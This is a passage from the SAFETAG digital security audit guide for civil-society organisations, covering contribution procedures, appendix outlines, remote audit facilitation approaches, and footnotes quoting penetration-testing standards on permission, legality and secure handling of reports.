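    for problem in lint_variants(FILES):
        print("LINT:", problem)
```

Run it before opening a pull request: a variant that carries its own heading renders correctly on its own but produces a duplicated or mis-nested heading once the build includes it under the `######` line in instructions.md.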

Other SAFETAG Content

These sections operate at header level 1, and for the most part should be included in any custom creation of SAFETAG products.

Front and Back Matter

Generally speaking, these sections won't be updated very often.

| Section | ADIDS | Guide | Overview | Description |
|---|---|---|---|---|
| Title Page | + | + | + | Can be customized for your needs, locally only |
| License | + | + | + | Please do not change the License |
| Introduction | - | + | + | Welcome language |
| Overview | - | + | + | An overview of the SAFETAG approach and the audit life-cycle |
| "Metro" Map | + | + | + | |
| Risk Assessment | | + | + | |
| Agency Building | | + | + | |
| Operational Security | - | + | - | Overall operational security concerns for the assessment process |
| Preparation | - | + | + | How to prepare to conduct an assessment |
| Appendices | - | + | - | Including the Code of Conduct, How To Read this Guide, Contribution guidance, and more. |
| Footnotes | - | + | + | |

Reporting Contents

Reporting content and creation will be revisited shortly

Contributing

Once you've scoped your submission as described under "Getting Started" and the "Content Creation Guidelines" sections above, you can follow the fork/pull method or use the templated approach to submit new content. Regardless of the approach you take,

Using Submission Templates

We have developed easy-to-use templates for SAFETAG Methods and Activities you can use and submit with your issue. These can be found at en/templates/method-template.md and en/templates/activity-template.md. If you would like to edit these as word processor files, you can use pandoc for conversion: pandoc -i activity_template.md -o activity_template.odt. Final files should be submitted as markdown, however.

Please refer to the current Methods in the SAFETAG guide for additional detail and examples. The template will require manual merging into the repository, so please include how you would like to be credited.

Using Pull Requests

  1. Fork the repository, clone a local copy, and create a new branch for your work (see Resources below for help with using git).
  2. Update your issue with your fork so the community can follow along!
  3. Follow the content creation guidelines above to create or update content.
  4. Make many small, targeted commits with concise, clear commit messages. Keeping each pull request focused is greatly appreciated. Please submit different pull requests (and possibly even branches!) for different thematic work.
  5. Test to make sure your changes work by building the PDF and/or migrating the content into the static site generator system.
  6. Push to your fork and submit a pull request to the Dev branch!

Resources

APPENDIX: Draft Engagement and Confidentiality Agreement

In order to protect the privacy of SUBJECT, AUDITOR agrees to comply with the following restrictions:

APPENDIX: Travel Kit and Checklist

Travel Kit Checklist

Hardware
Software / digital resources
Facilitation Supplies
Logistics

APPENDIX: Remote Facilitation

Remote Facilitation

Summary

This component suggests approaches to use if in-person facilitation is not possible, and to include participation from remote staff or offices when an organization has multiple locations. This supplements the Data Assessment, Process Mapping, and Threat Assessment exercises, enabling them to be conducted remotely.

This may not provide as deep results as in-person facilitation, but should provide adequate levels of expansion and verification of the information needed, and in most cases even provide the secondary benefit of helping the organization build a shared understanding of its processes, risks, and risk tolerances.

Overview

Conducting a digital security audit remotely requires great commitment from both the auditor and the organization. It requires careful planning, scheduling, documentation and coordination from both parties.

As situations may arise during the course of the project, adherence to the activities indicated on the project plan is required. Constant communication and participation are the keys for a successful remote audit.

After preparing the list in "materials_needed", you may first start selecting or combining different approaches in conducting remote audit.

There are four different approaches you can use, depending on what resources are available, the size and structure of the organization, and which activities you are trying to facilitate remotely. Is there someone that can help as an on-site facilitator? Are video conferences realistic (given bandwidth and cost)? How does the approach you use interact with existing organizational team structures?

Planning your audit:

Depending on which area you are auditing, you may decide on using mixed approaches during the course of the audit.

Materials Needed

In preparation for the remote facilitation activity, the following materials and documentation should be considered.

Considerations

Remote facilitation, if not done securely, can expose sensitive information belonging to both the auditor and the organization. There are different ways to communicate and exchange information remotely: voice calls, email, video conferences, survey forms, cloud storage, and chat messages. Choose your tools based on ease of adoption for the organization, proven security, and open source code (ideally audited) whenever possible.

Walkthrough

Selecting the most suitable approach requires an understanding of the capacity and personnel structure of the organization, including its ability to support communication technologies, and the availability of someone who can assist with facilitation.

After selecting the most suitable approach, the auditor should make sure to prepare for remote facilitation:

Approach 1, on-site facilitator, with video chat auditor

Suitable when there is a person who can take the facilitation role on-site. The facilitator does not have to be a technical person, but should be able to manage the session, making sure it is as inclusive and as productive as possible. This accommodates more participants per session than Approach 3. If the auditor is able to join remotely, this provides an ideal substitute for in-person facilitation.

Approach 2, hybrid online/synchronous

Can be used with a large group of participants, where it is possible to meet over multiple sessions with enough time to collect and analyse responses in between.

Approach 3, multiple small sessions

Suitable for medium to large groups where it is possible to conduct multiple small video chats. It is recommended that sessions be arranged to include people from the same organizational level but from different functions/teams/arms/departments of the organization. This approach scales to larger organizations and helps ensure that voices at different levels of the organization are heard.

Approach 4, hybrid offline/asynchronous

Sample Questions: Data Mapping

Footnotes


  1. Event Planning Inputs - Level-Up

  2. "Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed."

  3. "Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed."

  4. "In addition, some service providers require advance notice and/or separate permission prior to testing their systems. For example, Amazon has an online request form that must be completed, and the request must be approved before scanning any hosts on their cloud. If this is required, it should be part of the document."

  5. NIST SP 800-115, Technical Guide to Information Security Testing and Assessment. Section 7.1 Coordination

  6. "Obviously, being able to get in touch with the customer or target organization in an emergency is vital."

  7. See the auditor trainee resource list

  8. APPENDIX A - Auditor travel kit checklist

  9. "Traveling teams should maintain a flyaway kit that includes systems, images, additional tools, cables, projectors, and other equipment that a team may need when performing testing at other locations."

  10. Auditor Tool Resource List - Password Dictionary Creation

  11. APPENDIX A - Auditor travel kit checklist

  12. "Traveling teams should maintain a flyaway kit that includes systems, images, additional tools, cables, projectors, and other equipment that a team may need when performing testing at other locations."

  13. "Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed."

  14. "In addition, some service providers require advance notice and/or separate permission prior to testing their systems. For example, Amazon has an online request form that must be completed, and the request must be approved before scanning any hosts on their cloud. If this is required, it should be part of the document."

  15. "Obviously, being able to get in touch with the customer or target organization in an emergency is vital."

  16. "Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed."

  17. "In addition, some service providers require advance notice and/or separate permission prior to testing their systems. For example, Amazon has an online request form that must be completed, and the request must be approved before scanning any hosts on their cloud. If this is required, it should be part of the document."

  18. Determining Audit Location - The Penetration Testing Execution Standard: Pre-Engagement Guidelines

  19. "When handling evidence of a test and the differing stages of the report it is incredibly important to take extreme care with the data. Always use encryption and sanitize your test machine between tests."

  20. Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

  21. Determining Audit Location - The Penetration Testing Execution Standard: Pre-Engagement Guidelines

  22. "Before starting a penetration test, all targets must be identified."

  23. "Obviously, being able to get in touch with the customer or target organization in an emergency is vital."

  24. "the assessment plan should provide specific guidance on incident handling in the event that assessors cause or uncover an incident during the course of the assessment. This section of the plan should define the term incident and provide guidelines for determining whether or not an incident has occurred. The plan should identify specific primary and alternate points of contact for the assessors... The assessment plan should provide clear-cut instructions on what actions assessors should take in these situations."

  25. "When handling evidence of a test and the differing stages of the report it is incredibly important to take extreme care with the data. Always use encryption and sanitize your test machine between tests."

  26. "One of the most important documents which need to be obtained for a penetration test is the Permission to Test document."

  27. Dealing with third parties - The Penetration Testing Execution Standard

  28. APPENDIX D - Auditor Consent Template.

  29. NIST SP 800-115, Technical Guide to Information Security Testing and Assessment. Section 7.1 Coordination

  30. "Obviously, being able to get in touch with the customer or target organization in an emergency is vital."

  31. NIST SP 800-115, Technical Guide to Information Security Testing and Assessment. Section 7.1 Coordination

  32. Emergency Contact and Incidents - The Penetration Testing Execution Standard: Pre-Engagement Guidelines

  33. "Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed."

  34. "Assessors need to remain abreast of new technology and the latest means by which an adversary may attack that technology. They should periodically refresh their knowledge base, reassess their methodology-updating techniques as appropriate, and update their tool kits."

  35. "Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed."

  36. "IDEO Human-Centered Design Toolkit"

  37. "IDEO Human-Centered Design Toolkit"

  38. Accumulating information about partners, clients, and competitors - The Penetration Testing Execution Standard

  39. The flow of information through the Recon-ng framework. (See: "Data Flow" section)

  40. Accumulating information about partners, clients, and competitors - The Penetration Testing Execution Standard

  41. Acquiring API Keys

  42. The flow of information through the Recon-ng framework. (See: "Data Flow" section)

  43. "Threat Modeling: Designing for Security" by Adam Shostack

  44. See: Vulnerability Analysis

  45. Identifying Software Versions

  46. Examining Firewalls Across OS

  47. Identifying Odd/One-Off Services

  48. APPENDIX C - Password Survey

  49. Password Security

  50. Privilege Separation Across OS

  51. Anti-Virus Updates

  52. Identifying Software Versions

  53. Device Encryption By OS Type

  54. APPENDIX C - Password Survey

  55. Password Security

  56. Privilege Separation Across OS

  57. Anti-Virus Updates

  58. Identifying Software Versions

  59. Device Encryption By OS Type

  60. Microsoft Security Bulletin

  61. "In-Depth Reading, Vendor Information, & External Advisories"

  62. "Security-Related Vendor Information"

  63. "CERT/CC Advisories"

  64. "Security Tracker"

  65. "Known Vulnerabilities in Mozilla Products"

  66. Microsoft Security Bulletin

  67. "In-Depth Reading, Vendor Information, & External Advisories"

  68. "Security-Related Vendor Information"

  69. "CERT/CC Advisories"

  70. "Security Tracker"

  71. "Known Vulnerabilities in Mozilla Products"

  72. "While vulnerability scanners check only for the possible existence of a vulnerability, the attack phase of a penetration test exploits the vulnerability to confirm its existence."

  73. "Penetration testing also poses a high risk to the organization’s networks and systems because it uses real exploits and attacks against production systems and data. Because of its high cost and potential impact, penetration testing of an organization’s network and systems on an annual basis may be sufficient. Also, penetration testing can be designed to stop when the tester reaches a point when an additional action will cause damage." - NIST SP 800-115, Technical Guide to Information Security Testing and Assessment

  74. Network Access

  75. APPENDIX B - Personal Information to Keep Private

  76. APPENDIX B - Personal Information to Keep Private

  77. "CSOs should gradually build a culture in which all staff, regardless of technical background, feel some responsibility for their own digital hygiene. While staff need not become technical experts, CSOs should attempt to raise the awareness of every staff member, from executive directors to interns - groups are only as strong as their weakest link—so that they can spot issues, reduce vulnerabilities, know where to go for further help, and educate others."

  78. "Pre-Mortem Strategy" - Sources of Power: How People Make Decisions - p.71

  79. "Pre-Mortem Strategy" - Sources of Power: How People Make Decisions - p.71

  80. "Pre-Mortem Strategy" - Sources of Power: How People Make Decisions - p.71

  81. Corruption Perception Index

  82. The ISC Project completes evaluations of information security threats in a broad range of countries. The resulting comprehensive written assessments describe each country’s digital security situation through consideration of four main categories: online surveillance, online attacks, online censorship, and user profile/access.

  83. EISF distributes frequent analysis and summaries of issues relevant to humanitarian security risk management.

  84. The top 500 sites in each country or territory.

  85. Who publishes Transparency Reports?

  86. "Impacts: Chapter 2.7 p. 46 - Operational Security Management in Violent Environments"

  87. "Likelihood: Chapter 2.7 p. 47 - Operational Security Management in Violent Environments"

  88. "Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed."

  89. "Threat Modeling: Designing for Security" by Adam Shostack

  90. See: "Threat Modeling: Designing for Security" by Adam Shostack, p. 125.

  91. "Threat Modeling: Designing for Security" by Adam Shostack

  92. See: "Threat Modeling: Designing for Security" by Adam Shostack, p. 401.

  93. "When a pilot lands an airliner, their job isn’t over. They still have to navigate the myriad of taxiways and park at the gate safely. The same is true of you and your pen test reports, just because its finished doesn't mean you can switch off entirely. You still have to get the report out to the client, and you have to do so securely. Electronic distribution using public key cryptography is probably the best option, but not always possible. If symmetric encryption is to be used, a strong key should be used and must be transmitted out of band. Under no circumstances should a report be transmitted unencrypted. It all sounds like common sense, but all too often people fall down at the final hurdle." - The Art of Writing Penetration Test Reports